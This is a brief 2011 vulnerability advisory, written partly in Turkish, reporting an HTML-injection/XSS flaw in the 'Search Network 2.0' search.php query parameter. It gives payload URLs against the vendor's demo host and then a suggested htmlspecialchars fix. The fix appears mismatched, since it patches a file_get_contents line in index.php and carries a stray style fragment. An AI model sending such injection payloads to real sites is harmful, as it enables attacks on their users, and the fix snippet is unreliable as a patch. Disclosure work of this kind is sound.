##############################################################

[#] Script Name : Search Network 2.0

[#] Vulnerable Type : XSS Vulnerability

[#] Author : darkTR

[#] Date : 03.08.2011

[#] E-mail : darkTR@hotmail.com

[#] Target: : search.php?action=search_results&query=[XSS]

[#] Demo: : http://developer.searchnetworkhq.com/demo/search.php?

#############################################################

Exploits :

HTML İNJECTION

http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=“><marquee>darkTR<%2Fmarquee>

XSS

http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]

Açığın Kapatılması ;


Htmlspecialchars kullanarak açığı kapatabiliriz. İndex.php dosyasını açarak ;

$result = file_get_contents($url);, (Helvetica, sans-serif">Bu kısmı aşağıdaki şekilde düzeltmeliyiz.)

$result = htmlspecialchars(file_get_contents($url));

Düzeltme işleminden sonra ">,<" gibi karakterler html’ye dönüşecektir ve zaafiyet ortadan kalkacaktır.

darkTR | Code Hunters TIM